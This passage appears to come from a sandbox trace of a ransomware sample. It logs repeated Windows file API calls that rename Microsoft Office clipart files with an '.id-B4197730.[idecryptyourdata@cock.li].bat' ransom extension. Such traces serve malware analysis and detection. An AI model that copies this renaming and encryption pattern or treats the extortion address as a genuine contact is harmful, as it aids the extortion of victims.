lpNewFilePointer=0x0) returned 1 [0162.399] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.400] CloseHandle (hObject=0x514) returned 1 [0162.400] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.401] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.401] CloseHandle (hObject=0x514) returned 1 [0162.402] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.402] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.402] CloseHandle (hObject=0x514) returned 1 [0162.403] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.403] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.403] CloseHandle (hObject=0x514) returned 1 [0162.404] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.404] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.405] CloseHandle (hObject=0x514) returned 1 [0162.445] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.445] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.446] CloseHandle (hObject=0x514) returned 1 [0162.447] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.447] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.447] CloseHandle (hObject=0x514) returned 1 [0162.448] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.448] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.449] CloseHandle (hObject=0x514) returned 1 [0162.450] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.450] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.450] CloseHandle (hObject=0x514) returned 1 [0162.453] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.453] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.453] CloseHandle (hObject=0x514) returned 1 [0162.454] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.454] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.455] CloseHandle (hObject=0x514) returned 1 [0162.564] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.564] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.565] CloseHandle (hObject=0x51c) returned 1 [0162.567] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.567] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.567] CloseHandle (hObject=0x51c) returned 1 [0162.569] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.569] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.570] CloseHandle (hObject=0x51c) returned 1 [0162.570] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.570] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.571] CloseHandle (hObject=0x51c) returned 1 [0162.572] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.572] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.572] CloseHandle (hObject=0x51c) returned 1 [0162.573] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.573] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.573] CloseHandle (hObject=0x51c) returned 1 [0162.579] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.579] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.580] CloseHandle (hObject=0x51c) returned 1 [0162.580] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.580] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.581] CloseHandle (hObject=0x51c) returned 1 [0162.581] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.581] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.582] CloseHandle (hObject=0x51c) returned 1 [0162.583] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.583] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.583] CloseHandle (hObject=0x51c) returned 1 [0162.584] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.584] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.585] CloseHandle (hObject=0x51c) returned 1 [0162.587] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.587] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.587] CloseHandle (hObject=0x51c) returned 1 [0162.588] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.588] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.588] CloseHandle (hObject=0x51c) returned 1 [0162.589] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.589] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.590] CloseHandle (hObject=0x51c) returned 1 [0162.592] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.592] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.592] CloseHandle (hObject=0x51c) returned 1 [0162.594] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.594] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.594] CloseHandle (hObject=0x51c) returned 1 [0162.599] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.599] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.599] CloseHandle (hObject=0x50c) returned 1 [0162.600] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.601] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.601] CloseHandle (hObject=0x50c) returned 1 [0162.602] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.602] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.786] CloseHandle (hObject=0x50c) returned 1 [0162.787] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.787] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.787] CloseHandle (hObject=0x50c) returned 1 [0162.788] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.788] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151047.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151047.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.788] CloseHandle (hObject=0x50c) returned 1 [0162.789] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.789] SetFilePointerEx (in: hFile=0x50c, 